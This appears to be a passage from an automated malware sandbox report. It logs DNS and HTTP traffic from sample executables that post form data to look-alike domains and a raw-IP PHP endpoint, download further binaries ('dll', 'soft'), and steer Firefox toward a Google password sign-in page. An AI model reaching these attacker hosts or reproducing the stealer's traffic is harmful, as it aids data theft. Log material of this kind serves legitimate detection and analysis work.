                    5cf0a9b56c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    wxayfarer.live
                    IN A
                    Response
                  • flag-us
                    DNS
                    sighbtseeing.shop
                    d744367ecb.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    sighbtseeing.shop
                    IN A
                    Response
                  • flag-us
                    POST
                    https://advennture.top/GKsiio
                    d744367ecb.exe
                    Remote address:
                    104.21.25.9:443
                    Request
                    POST /GKsiio HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                    Content-Length: 65
                    Host: advennture.top
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3LqzfFMJgY1zm9t56T2i9mDhL%2FQj4%2BRZWQm73WsBC1e4HQ6g2PPamyKcjJGz35eQ0g%2B5Imf36vwa4xYzAScDsPG1642ICCboN%2FB%2BAWSheGCv1yh72QfYeSCJkkjLwvx5cw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 927fe403394f948f-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=50176&min_rtt=47964&rtt_var=14260&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=646&delivery_rate=81522&cwnd=253&unsent_bytes=0&cid=b6b76edcab342490&ts=270&x=0"
                  • flag-us
                    POST
                    https://advennture.top/GKsiio
                    d744367ecb.exe
                    Remote address:
                    104.21.25.9:443
                    Request
                    POST /GKsiio HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=WhfUfEpAl
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                    Content-Length: 1489
                    Host: advennture.top
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vnh4zWGdP7Qea2ZI0GEiY5aG%2BAfMoJWeCaxi%2BnKymqk0WTXVVRzqSU6oxuQ8r0BOVqkZxi5IsZ4YuE5wKHgGxVetsX0eCQ50FMg4PpagpbFbAoyOSggzi3OUeTaHW%2FaTVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 927fe404cae6948f-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=49310&min_rtt=43174&rtt_var=12427&sent=9&recv=11&lost=0&retrans=0&sent_bytes=3806&recv_bytes=2480&delivery_rate=81522&cwnd=255&unsent_bytes=0&cid=b6b76edcab342490&ts=451&x=0"
                  • flag-us
                    POST
                    https://oreheatq.live/gsopp
                    5cf0a9b56c.exe
                    Remote address:
                    172.67.172.183:443
                    Request
                    POST /gsopp HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                    Content-Length: 51
                    Host: oreheatq.live
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fJ%2Bt4ZrgwOxh%2FTtDzyrxe9KSYTuTfT8PWd1j7YFJA19ya1FFbPM2K4DRNlC3%2BLE4RNhFZeWGKznfSlYoMFwuEMNeucgUjDKYfslK%2Bldz6DzGFIw%2FRhK8Tla3owxRj5hu"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 927fe403b96d641e-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=50240&min_rtt=47228&rtt_var=15682&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=629&delivery_rate=82757&cwnd=253&unsent_bytes=0&cid=62414d919f356a45&ts=210&x=0"
                  • flag-us
                    POST
                    https://oreheatq.live/gsopp
                    5cf0a9b56c.exe
                    Remote address:
                    172.67.172.183:443
                    Request
                    POST /gsopp HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=WKUYIf9Ylbj3ASnWEv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                    Content-Length: 1520
                    Host: oreheatq.live
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Server: cloudflare
                    Vary: Accept-Encoding
                    Cf-Cache-Status: DYNAMIC
                    CF-RAY: 927fe404fa7c641e-LHR
                    alt-svc: h3=":443"; ma=86400
                  • flag-us
                    POST
                    https://advennture.top/GKsiio
                    d744367ecb.exe
                    Remote address:
                    104.21.25.9:443
                    Request
                    POST /GKsiio HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=1nb9lnAxrvW
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                    Content-Length: 1074
                    Host: advennture.top
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bBsqauHJUt1SyyguzaOzP1K%2Frky8414jF7Nt89Ep%2FrOf7ioRWnefAA0LjPm3jlCxIPKtczKlVLhvWShBHvyaqwHvvs7PISvtfwecvq3I0vaUluk%2FTWULH4CPTkP2NxXvog%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 927fe4070a5603bb-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=48198&min_rtt=43374&rtt_var=16541&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=1670&delivery_rate=61480&cwnd=253&unsent_bytes=0&cid=c8ccdaac82dbd404&ts=281&x=0"
                  • flag-us
                    POST
                    https://oreheatq.live/gsopp
                    5cf0a9b56c.exe
                    Remote address:
                    172.67.172.183:443
                    Request
                    POST /gsopp HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=MMzfMv0GA9t
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                    Content-Length: 1060
                    Host: oreheatq.live
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Server: cloudflare
                    Vary: Accept-Encoding
                    Cf-Cache-Status: DYNAMIC
                    CF-RAY: 927fe40718de1adb-LHR
                    alt-svc: h3=":443"; ma=86400
                  • flag-us
                    POST
                    https://oreheatq.live/gsopp
                    5cf0a9b56c.exe
                    Remote address:
                    172.67.172.183:443
                    Request
                    POST /gsopp HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                    Content-Length: 89
                    Host: oreheatq.live
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mJ00qh1X5SBw%2BOPw0E64VM3dOXj5vVx8zS0XfGGO45qmhy3gET77bE8QBIWVKLsmUxp37%2BLI2uCLUHPCKdRRepxFn1ifQ7pxeYmpMp7TzA2vpjpg8JCitQUOZduYSiPo"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 927fe4092810369a-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=45228&min_rtt=43110&rtt_var=12643&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=661&delivery_rate=81668&cwnd=253&unsent_bytes=0&cid=5a229ddcb20f83e7&ts=250&x=0"
                  • flag-us
                    POST
                    https://advennture.top/GKsiio
                    d744367ecb.exe
                    Remote address:
                    104.21.25.9:443
                    Request
                    POST /GKsiio HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                    Content-Length: 103
                    Host: advennture.top
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tiflLA4zGGhlxv7UKx8RrNgHDnFRNLsvWf2V%2FCTCQGYYv5C7nXnmzP4uCic16RQXkdr0J8ZhyLwIKNJ2HcVI4Zj2sGs%2FX4ufMEBG7pnb5XG3gUccvUxPDN5ZcjkTg5RR2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 927fe40938f08862-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=44743&min_rtt=42949&rtt_var=12091&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=678&delivery_rate=81103&cwnd=253&unsent_bytes=0&cid=9dbe54829a33b13c&ts=190&x=0"
                  • flag-nl
                    GET
                    http://185.156.73.98/ycl
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /ycl HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: d
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:59 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Disposition: attachment; filename="dll";
                    Content-Length: 242176
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                  • flag-nl
                    GET
                    http://185.156.73.98/ycl
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /ycl HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: s
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:59 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Disposition: attachment; filename="soft";
                    Content-Length: 3096296
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                  • flag-ru
                    GET
                    http://45.93.20.28/
                    57dbff855a.exe
                    Remote address:
                    45.93.20.28:80
                    Request
                    GET / HTTP/1.1
                    Host: 45.93.20.28
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:01 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-ru
                    POST
                    http://45.93.20.28/85a1cacf11314eb8.php
                    57dbff855a.exe
                    Remote address:
                    45.93.20.28:80
                    Request
                    POST /85a1cacf11314eb8.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAK
                    Host: 45.93.20.28
                    Content-Length: 212
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:01 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/ycl
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /ycl HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: d
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:02 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Disposition: attachment; filename="dll";
                    Content-Length: 242176
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                  • flag-nl
                    GET
                    http://185.156.73.98/ycl
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /ycl HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: s
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:02 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Disposition: attachment; filename="soft";
                    Content-Length: 3096296
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                  • flag-us
                    DNS
                    youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube.com
                    IN A
                    Response
                    youtube.com
                    IN A
                    172.217.16.238
                  • flag-us
                    DNS
                    spocs.getpocket.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    spocs.getpocket.com
                    IN A
                    Response
                    spocs.getpocket.com
                    IN CNAME
                    prod.ads.prod.webservices.mozgcp.net
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    34.117.188.166
                  • flag-us
                    DNS
                    getpocket.cdn.mozilla.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    getpocket.cdn.mozilla.net
                    IN A
                    Response
                    getpocket.cdn.mozilla.net
                    IN CNAME
                    getpocket-cdn.prod.mozaws.net
                    getpocket-cdn.prod.mozaws.net
                    IN CNAME
                    prod.pocket.prod.cloudops.mozgcp.net
                    prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                    34.120.5.221
                  • flag-us
                    DNS
                    getpocket.cdn.mozilla.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    getpocket.cdn.mozilla.net
                    IN A
                  • flag-us
                    DNS
                    youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube.com
                    IN A
                    Response
                    youtube.com
                    IN A
                    172.217.16.238
                  • flag-us
                    DNS
                    youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube.com
                    IN A
                  • flag-us
                    DNS
                    prod.ads.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    34.117.188.166
                  • flag-us
                    DNS
                    prod.ads.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                  • flag-gb
                    GET
                    https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                    firefox.exe
                    Remote address:
                    172.217.16.238:443
                    Request
                    GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                    host: youtube.com
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    upgrade-insecure-requests: 1
                    sec-fetch-dest: document
                    sec-fetch-mode: navigate
                    sec-fetch-site: none
                    sec-fetch-user: ?1
                    te: trailers
                  • flag-gb
                    GET
                    https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                    firefox.exe
                    Remote address:
                    172.217.16.238:443
                    Request
                    GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
                    host: www.youtube.com
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    upgrade-insecure-requests: 1
                    sec-fetch-dest: document
                    sec-fetch-mode: navigate
                    sec-fetch-site: none
                    sec-fetch-user: ?1
                    te: trailers
                  • flag-us
                    DNS
                    www.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.youtube.com
                    IN A
                    Response
                    www.youtube.com
                    IN CNAME
                    youtube-ui.l.google.com
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.178.14
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.78
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.206
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.206
                    youtube-ui.l.google.com
                    IN A
                    216.58.204.78
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.201.110
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.14
                    youtube-ui.l.google.com
                    IN A
                    172.217.16.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.179.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.46
                    youtube-ui.l.google.com
                    IN A
                    142.250.180.14
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
                    IN A
                    142.250.187.206
                  • flag-gb
                    GET
                    https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                    firefox.exe
                    Remote address:
                    142.250.187.206:443
                    Request
                    GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                    host: consent.youtube.com
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    cookie: SOCS=CAAaBgiA8Jy_Bg
                    cookie: YSC=R4-CPIjoC80
                    cookie: __Secure-YEC=CgtYcDBvbzdJQWtuYyjq-Z-_BjIKCgJHQhIEGgAgVQ%3D%3D
                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgVQ%3D%3D
                    upgrade-insecure-requests: 1
                    sec-fetch-dest: document
                    sec-fetch-mode: navigate
                    sec-fetch-site: none
                    sec-fetch-user: ?1
                    te: trailers
                  • flag-us
                    GET
                    https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                    firefox.exe
                    Remote address:
                    34.120.5.221:443
                    Request
                    GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
                    host: getpocket.cdn.mozilla.net
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: */*
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    sec-fetch-dest: empty
                    sec-fetch-mode: cors
                    sec-fetch-site: cross-site
                    if-none-match: W/"566c-gZ4b9k1ZDsECRpHn2dprj3Ctmjw"
                    te: trailers
                  • flag-us
                    DNS
                    prod.ads.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.ads.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube.com
                    IN AAAA
                    Response
                    youtube.com
                    IN AAAA
                    2a00:1450:4009:821::200e
                  • flag-us
                    DNS
                    shavar.prod.mozaws.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    shavar.prod.mozaws.net
                    IN A
                    Response
                    shavar.prod.mozaws.net
                    IN A
                    44.240.131.83
                    shavar.prod.mozaws.net
                    IN A
                    54.213.200.248
                    shavar.prod.mozaws.net
                    IN A
                    44.227.3.195
                  • flag-us
                    DNS
                    shavar.prod.mozaws.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    shavar.prod.mozaws.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    34.149.100.209
                  • flag-us
                    DNS
                    prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN AAAA
                    2600:1901:0:c47c::
                  • flag-us
                    DNS
                    youtube-ui.l.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube-ui.l.google.com
                    IN A
                    Response
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.179.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.206
                    youtube-ui.l.google.com
                    IN A
                    216.58.201.110
                    youtube-ui.l.google.com
                    IN A
                    142.250.180.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.178.14
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.14
                    youtube-ui.l.google.com
                    IN A
                    172.217.16.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.204.78
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.46
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.206
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.78
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
                    IN A
                    142.250.187.206
                  • flag-us
                    DNS
                    prod.pocket.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                    Response
                    prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                    34.120.5.221
                  • flag-us
                    DNS
                    youtube-ui.l.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube-ui.l.google.com
                    IN AAAA
                    Response
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:81d::200e
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:81e::200e
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:80b::200e
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:819::200e
                  • flag-us
                    DNS
                    prod.pocket.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.pocket.prod.cloudops.mozgcp.net
                    IN AAAA
                    Response
                    prod.pocket.prod.cloudops.mozgcp.net
                    IN AAAA
                    2600:1901:0:524c::
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN AAAA
                    Response
                    consent.youtube.com
                    IN AAAA
                    2a00:1450:4009:81f::200e
                  • flag-us
                    DNS
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN A
                    34.160.144.191
                  • flag-us
                    DNS
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN AAAA
                    2600:1901:0:92a9::
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN A
                    Response
                    www.google.com
                    IN A
                    142.250.180.4
                  • flag-gb
                    GET
                    https://www.google.com/favicon.ico
                    firefox.exe
                    Remote address:
                    142.250.180.4:443
                    Request
                    GET /favicon.ico HTTP/2.0
                    host: www.google.com
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: image/avif,image/webp,*/*
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    referer: https://consent.youtube.com/
                    sec-fetch-dest: image
                    sec-fetch-mode: no-cors
                    sec-fetch-site: cross-site
                    te: trailers
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN A
                    Response
                    www.google.com
                    IN A
                    142.250.180.4
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN AAAA
                    Response
                    www.google.com
                    IN AAAA
                    2a00:1450:4009:81e::2004
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
